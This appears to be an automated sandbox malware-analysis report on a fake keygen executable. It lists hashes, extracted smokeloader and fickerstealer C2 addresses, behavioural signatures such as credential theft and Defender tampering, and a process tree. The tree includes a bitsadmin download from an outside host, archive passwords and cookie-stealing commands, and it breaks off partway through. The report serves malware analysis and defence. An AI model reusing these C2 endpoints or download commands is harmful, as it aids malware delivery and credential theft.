Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1686s
  • max time network
    1801s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    28-04-2021 18:03

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • WarzoneRat, AveMaria

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 9 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • NTFS ADS 5 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 34 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:868
        • C:\Windows\system32\wbem\WMIADAP.EXE
          wmiadap.exe /F /T /R
          3⤵
            PID:1936
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {98107A8A-F2E3-4E50-BDDA-F4AFB6540B26} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
            3⤵
              PID:2776
              • C:\Users\Admin\AppData\Roaming\eeigruu
                C:\Users\Admin\AppData\Roaming\eeigruu
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:1876
                • C:\Users\Admin\AppData\Roaming\eeigruu
                  C:\Users\Admin\AppData\Roaming\eeigruu
                  5⤵
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:684
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {D7D7FF40-62FF-4ED2-9304-A566F271D3AD} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
              3⤵
                PID:2204
                • C:\Users\Admin\AppData\Roaming\eeigruu
                  C:\Users\Admin\AppData\Roaming\eeigruu
                  4⤵
                  • Suspicious use of SetThreadContext
                  PID:2280
                  • C:\Users\Admin\AppData\Roaming\eeigruu
                    C:\Users\Admin\AppData\Roaming\eeigruu
                    5⤵
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:820
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {F7983DC5-F8DD-40B3-A3B1-9C7560AA5C47} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
                3⤵
                  PID:524
                  • C:\Users\Admin\AppData\Roaming\eeigruu
                    C:\Users\Admin\AppData\Roaming\eeigruu
                    4⤵
                      PID:1532
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                  • Checks processor information in registry
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:1736
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                  • Checks processor information in registry
                  • Modifies registry class
                  PID:2096
              • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                1⤵
                • Loads dropped DLL
                • Checks whether UAC is enabled
                • Suspicious use of WriteProcessMemory
                PID:368
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                  2⤵
                  • Executes dropped EXE
                  • Drops file in Program Files directory
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:2028
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                    3⤵
                    • Loads dropped DLL
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:2004
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1920
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:592
                  • C:\Users\Admin\AppData\Local\Temp\is-U49UK.tmp\Install.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-U49UK.tmp\Install.tmp" /SL5="$30180,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1636
                    • C:\Users\Admin\AppData\Local\Temp\is-O9MD7.tmp\Ultra.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-O9MD7.tmp\Ultra.exe" /S /UID=burnerch1
                      4⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Drops file in Program Files directory
                      • Modifies system certificate store
                      • Suspicious use of WriteProcessMemory
                      PID:1808
                      • C:\Program Files\Windows Media Player\NASDWOZMEM\ultramediaburner.exe
                        "C:\Program Files\Windows Media Player\NASDWOZMEM\ultramediaburner.exe" /VERYSILENT
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1656
                        • C:\Users\Admin\AppData\Local\Temp\is-OCV6S.tmp\ultramediaburner.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-OCV6S.tmp\ultramediaburner.tmp" /SL5="$20188,281924,62464,C:\Program Files\Windows Media Player\NASDWOZMEM\ultramediaburner.exe" /VERYSILENT
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in Program Files directory
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of WriteProcessMemory
                          PID:1320
                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                            7⤵
                            • Executes dropped EXE
                            PID:1468
                      • C:\Users\Admin\AppData\Local\Temp\42-f009b-1b0-700a7-65841ea055699\Nojupyroqa.exe
                        "C:\Users\Admin\AppData\Local\Temp\42-f009b-1b0-700a7-65841ea055699\Nojupyroqa.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:1920
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                          6⤵
                          • Modifies Internet Explorer settings
                          • Suspicious behavior: GetForegroundWindowSpam
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          PID:1756
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1756 CREDAT:275457 /prefetch:2
                            7⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:1708
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1756 CREDAT:1258505 /prefetch:2
                            7⤵
                            • NTFS ADS
                            • Suspicious use of SetWindowsHookEx
                            PID:2596
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1756 CREDAT:340994 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:1556
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1756 CREDAT:865311 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:3024
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1756 CREDAT:734329 /prefetch:2
                            7⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:2628
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1756 CREDAT:3617837 /prefetch:2
                            7⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:2896
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1756 CREDAT:210122 /prefetch:2
                            7⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:1676
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1756 CREDAT:2569231 /prefetch:2
                            7⤵
                            • Suspicious use of SetWindowsHookEx
                            PID:2236
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                          6⤵
                            PID:2520
                        • C:\Users\Admin\AppData\Local\Temp\07-693e5-c3b-b6e90-60a1010c9f1dd\Javaefaefoqae.exe
                          "C:\Users\Admin\AppData\Local\Temp\07-693e5-c3b-b6e90-60a1010c9f1dd\Javaefaefoqae.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1956
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dwacv3ux.4ud\001.exe & exit
                            6⤵
                              PID:2480
                              • C:\Users\Admin\AppData\Local\Temp\dwacv3ux.4ud\001.exe
                                C:\Users\Admin\AppData\Local\Temp\dwacv3ux.4ud\001.exe
                                7⤵
                                • Executes dropped EXE
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:2816
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\upaaw1qy.cne\gpooe.exe & exit
                              6⤵
                                PID:1968
                                • C:\Users\Admin\AppData\Local\Temp\upaaw1qy.cne\gpooe.exe
                                  C:\Users\Admin\AppData\Local\Temp\upaaw1qy.cne\gpooe.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                  PID:2824
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    8⤵
                                      PID:3048
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:2224
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                        PID:728
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                          PID:920
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lht5xypg.bdn\google-game.exe & exit
                                      6⤵
                                        PID:2728
                                        • C:\Users\Admin\AppData\Local\Temp\lht5xypg.bdn\google-game.exe
                                          C:\Users\Admin\AppData\Local\Temp\lht5xypg.bdn\google-game.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3052
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                            8⤵
                                            • Loads dropped DLL
                                            • Modifies registry class
                                            PID:3044
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5j5kiraa.rpd\md2_2efs.exe & exit
                                        6⤵
                                          PID:1376
                                          • C:\Users\Admin\AppData\Local\Temp\5j5kiraa.rpd\md2_2efs.exe
                                            C:\Users\Admin\AppData\Local\Temp\5j5kiraa.rpd\md2_2efs.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:3048
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\foyi5doc.3g0\askinstall39.exe & exit
                                          6⤵
                                            PID:2060
                                            • C:\Users\Admin\AppData\Local\Temp\foyi5doc.3g0\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\foyi5doc.3g0\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:2908
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:2176
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:2572
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01bkl3do.1h1\jvppp.exe & exit
                                              6⤵
                                                PID:944
                                                • C:\Users\Admin\AppData\Local\Temp\01bkl3do.1h1\jvppp.exe
                                                  C:\Users\Admin\AppData\Local\Temp\01bkl3do.1h1\jvppp.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                  PID:1996
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:2296
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:2128
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    8⤵
                                                      PID:3024
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      8⤵
                                                        PID:2228
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubmh5mz5.ffm\005.exe & exit
                                                    6⤵
                                                      PID:920
                                                      • C:\Users\Admin\AppData\Local\Temp\ubmh5mz5.ffm\005.exe
                                                        C:\Users\Admin\AppData\Local\Temp\ubmh5mz5.ffm\005.exe
                                                        7⤵
                                                          PID:2892
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3xing3z1.5st\requête.exe & exit
                                                        6⤵
                                                          PID:1616
                                                          • C:\Users\Admin\AppData\Local\Temp\3xing3z1.5st\requête.exe
                                                            C:\Users\Admin\AppData\Local\Temp\3xing3z1.5st\requête.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                            PID:2936
                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
                                                              8⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              PID:2864
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                parse.exe -f json -b firefox
                                                                9⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:2284
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                parse.exe -f json -b chrome
                                                                9⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:1364
                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
                                                                parse.exe -f json -b edge
                                                                9⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                PID:2972
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mg1jxbz3.b0f\SunLabsPlayer.exe /S & exit
                                                          6⤵
                                                            PID:2740
                                                            • C:\Users\Admin\AppData\Local\Temp\mg1jxbz3.b0f\SunLabsPlayer.exe
                                                              C:\Users\Admin\AppData\Local\Temp\mg1jxbz3.b0f\SunLabsPlayer.exe /S
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                              PID:2744
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                8⤵
                                                                • Drops file in Program Files directory
                                                                PID:2160
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:3004
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Drops file in Program Files directory
                                                                  PID:1492
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2088
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:1604
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:2928
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                        8⤵
                                                                        • Checks for any installed AV software in registry
                                                                        PID:1712
                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                        8⤵
                                                                        • Download via BitsAdmin
                                                                        PID:2684
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pOKhOLadG2OnzKgT -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Program Files directory
                                                                        PID:2812
                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -py2QhC3WhKeQ6Q6Y -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        • Modifies registry class
                                                                        PID:1736
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:1028
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:2320
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                            8⤵
                                                                            • Drops file in Program Files directory
                                                                            PID:3004
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:1536
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:2344
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HvRMIQmOqnAH\HvRMIQmOqnAH.dll" HvRMIQmOqnAH
                                                                                8⤵
                                                                                  PID:984
                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HvRMIQmOqnAH\HvRMIQmOqnAH.dll" HvRMIQmOqnAH
                                                                                    9⤵
                                                                                      PID:904
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:2240
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:2068
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                        • Drops file in Program Files directory
                                                                                        PID:1676
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:2288
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd8B8F.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:1472
                                                                                          • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
